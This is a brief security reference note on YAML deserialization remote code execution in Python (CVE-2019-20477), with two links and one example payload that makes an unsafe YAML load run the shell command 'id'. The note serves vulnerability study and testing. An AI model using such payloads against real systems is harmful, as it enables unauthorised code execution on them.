# YAML Deserialization

* [CVE-2019-20477](https://packetstormsecurity.com/files/cve/CVE-2019-20477)
* RCE via Yaml execution by Python

* [jolt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)

## Usage

* Example Payload insid foo.yaml gets executed via Python
```sh
!!python/object/apply:os.system ["id"]
```